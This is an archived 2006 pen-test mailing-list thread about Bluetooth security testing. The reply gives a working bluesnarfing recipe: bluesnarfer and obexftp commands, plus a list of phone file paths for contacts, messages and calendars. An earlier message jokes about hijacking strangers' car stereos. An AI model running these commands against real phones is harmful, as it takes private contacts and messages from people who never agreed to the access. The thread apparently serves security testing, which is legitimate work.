From: Martin Gustafsson (gustafsson.martin@bredband.net)
Date: Tue Aug 22 2006 - 16:27:41 EDT
Hi,
The car stereo trick can be done using carwhisperer (see Trifinites page).
I have not been monitoring bluetooth security for the last year, but here
are some commands you can run. Do not expect to find any major holes on a
new phone though...
COMMANDS:
hcitool info $BD_ADDR
hcitool name $BD_ADDR
sdptool browse $BD_ADDR
sdptool browse --tree $BD_ADDR
Snarf name and serial
bluesnarfer -i -b $BD_ADDR
Snarf phone books
bluesnarfer -l -b $BD_ADDR
Try to FTP files
obexftp -b $BD_ADDR -B $channel -g $file
The FTP channel is labeld "OBEX Object Push" when you run "sdptool browse"
Files I have found to be valid on different phones
telecom/cal.vcs
telecom/cal/###.vcs
telecom/cal/info.log
telecom/devinfo.txt
telecom/folderlisting
telecom/inmsg.vmg
telecom/note.vnt
telecom/outmsg.vmg
telecom/pb.vcf
telecom/pb/###.vcf
telecom/pb/0.vcf
telecom/pb/1.vcf
telecom/pb/info.log
telecom/push.txt
telecom/rtc.txt
telecom/sentmsg.vm
telecom/something.jph
Scan RFCOMM channels
rfcomm_scan $BD_ADDR
Scan 30 000 PSM ports (takes LONG time)
psm_scan $BD_ADDR
SOME LINKS:
Bluesweep:
http://www.airmagnet.com/products/bluesweep.htm
BLUETOOTH SECURITY TOOLS
http://student.vub.ac.be/~sijansse/2e%20lic/BT/Tools/Tools.html
Bluescanner
http://www.networkchemistry.com/products/bluescanner.php
Bluetooth projects
http://www.alighieri.org/project.html
Bluesniping
http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/
Bluetooth device security database
http://www.betaversion.net/btdsd/
BTscanner
http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=downloads
Bluetooth advisories and "Greenplaque"
http://www.digitalmunition.com/
Backtrack (Bootable pentest dist) got a bunch of bluetooth tools.
http://www.remote-exploit.org/index.php/BackTrack
Bluetooth tools
http://www.securitywireless.info/Downloads-index-req-viewdownload-cid-18.htm
l
Bluetest.pl
http://www.syss.de/links.html
Trifinite tools
http://trifinite.org/trifinite_downloads.html
Regards,
Martin Gustafsson
CISSP
-----Ursprungligt meddelande-----
Från: Robert D. Holtz [mailto:robert.d.holtz@gmail.com]
Skickat: den 22 augusti 2006 02:49
Till: steven@lovebug.org; pen-test@securityfocus.com
Ämne: RE: Bluetooth Pentesting?
Here's an interesting article on Blue tooth security:
http://ntrg.cs.tcd.ie/undergrad/4ba2.05/group15/index.html
There was also a story circulating awhile back about the ability to transmit
radio directly into someone's car stereo with a directional antenna. I'm
sorry that I can't recall the details but I found it amusing that you can
mess with someone by having whatever you want coming out their radio ... not
truly a "real" security issue but amusing none the less.
-----Original Message-----
From: steven@lovebug.org [mailto:steven@lovebug.org]
Sent: Monday, August 21, 2006 3:06 PM
To: pen-test@securityfocus.com
Subject: Bluetooth Pentesting?
Greetings,
Does anyone on this list do bluetooth pentesting? I have read tons of old
posts and found plenty of tools to do a few different things. However, I do
not find any of it to be overly useful. Most of the tools out there seem to
be aimed at certain cell phones or are very specific. I am trying to find
out what the risks are of all kinds of devices. I have found btscanner to
be pretty good at detecting devices but it doesn't do too much other than
detect it. I can scan and pickup 150+ devices and the Vulnerable to:
section is always the same.. blank. Are all the bluetooth devices I find so
super secure? I pick up cars, phones, PDAs, computers, keyboards, etc. Are
there really no risks with these devices?
Is there a better/good tool out there that can really find various bluetooth
devices and tell me what -real- risks might be associated with them -- on
top of that.. is there a good tool for trying to pull data or use these
devices? Example: a dell or mac laptop has bluetooth on, or a Treo with it
on.. what are the possible risks? What tools can actually test if
authentication is required for connecting with these devices.. or whether I
can bruteforce it or connect at all?
Any suggestions would be greatly appreciate and I am really trying to do
something more than just "detect" bluetooth devices. I need to know if
there are risks here.
Thanks
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Need to secure your web apps?
Cenzic Hailstorm finds vulnerabilities fast.
Click the link to buy it, try it or download Hailstorm for FREE.
http://www.cenzic.com/products_services/download_hailstorm.php
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:47 EDT